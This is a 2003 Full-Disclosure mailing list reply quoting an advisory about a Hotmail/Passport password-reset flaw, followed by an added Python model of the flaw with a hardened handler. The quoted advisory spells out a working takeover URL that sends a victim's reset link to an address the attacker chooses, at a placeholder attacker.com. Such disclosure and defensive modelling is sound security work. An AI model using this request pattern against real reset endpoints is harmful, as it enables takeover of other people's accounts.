Re: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
From: dong-h0un U (xploit_at_hackermail.com)
Date: 05/08/03
- Previous message: Christopher F. Herot: "RE: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
- Maybe in reply to: Muhammad Faisal Rauf Danka: "[Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
- Next in thread: Michael J McCafferty: "Re: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability"
To: mfrd@attitudex.com, full-disclosure@lists.netsys.com
Date: Thu, 08 May 2003 12:51:39 +0800
I encountered my mail hacking by this method.
And looked for a person who hack it.
This method could not be exhibited easily so.
Thanks for your information. :-)
P.S: Sorry for my poor English.
Hotmail's engineers desire to solve bug fast.
----- Original Message -----
From: Muhammad Faisal Rauf Danka <mfrd@attitudex.com>
Date: Wed, 7 May 2003 19:50:51 -0700 (PDT)
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
> Hotmail & Passport (.NET Accounts) Vulnerability
>
> There is a very serious and stupid vulnerability or bad coding in Hotmail / Passport’s (.NET Accounts)
>
> I tried sending emails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.
>
> I guess I don’t need to go in details of how crucial and important Hotmail / Passport’s .NET Account passport is to anyone.
>
> You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.
>
> It is so simple that it is funny.
>
> All you got to do is hit the following in your browser:
>
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1
>
> And you’ll get an email on attacker@attacker.com asking you to click on a url something like this:
>
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033
>
> From that url, you can reset the password and I don’t think I need to say anything more about it.
>
> Vulnerability / Flaw discovered : 12th April 2003
> Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)
>
>
> Regards
> --------
> Muhammad Faisal Rauf Danka
>
> _____________________________________________________________
> ---------------------------
> [ATTITUDEX.COM]
> http://www.attitudex.com/
> ---------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
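Added example, not part of the thread and not Microsoft's code: a small Python model of the flaw class the quoted advisory describes, where a reset request names the account in `em` and the delivery address in `prefem`, shown beside a handler that delivers only to the address on file. The server-side logic, the `idp.example` host, the account store and all addresses are assumptions constructed for illustration.

```python
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed account store: account e-mail -> recovery address on file.
ACCOUNTS = {"user@mail.example": "user-recovery@isp.example"}


def parse_reset_query(url):
    """Return the (em, prefem) query parameters of a reset request URL."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q.get("em", [""])[0], q.get("prefem", [""])[0]


def reset_trusting_client(url, outbox):
    """Flawed model: the token is mailed to whatever prefem the caller sent."""
    em, prefem = parse_reset_query(url)
    if em in ACCOUNTS:
        outbox.append((prefem, secrets.token_urlsafe(16)))
    return outbox


def reset_hardened(url, outbox, audit):
    """Deliver only to the address on file; record any other requested address."""
    em, prefem = parse_reset_query(url)
    on_file = ACCOUNTS.get(em)
    if on_file is None:
        return outbox  # same outcome whether or not the account exists
    if prefem and prefem.lower() != on_file.lower():
        # The delivery address is server-side state, never request input.
        audit.append({"account": em, "requested_delivery": prefem})
    outbox.append((on_file, secrets.token_urlsafe(16)))
    return outbox


# Constructed request in the shape of the URL quoted in the advisory.
SAMPLE = ("https://idp.example/reset?lc=1033&em=user%40mail.example"
          "&id=&cb=&prefem=other%40else.example&rst=1")

if __name__ == "__main__":
    print("flawed  ->", [to for to, _ in reset_trusting_client(SAMPLE, [])])
    audit_log = []
    print("hardened->", [to for to, _ in reset_hardened(SAMPLE, [], audit_log)])
    print("audit   ->", audit_log)
```

The audit entries written by the hardened handler double as a detection signal: repeated reset requests that name a delivery address different from the one on file are worth alerting on.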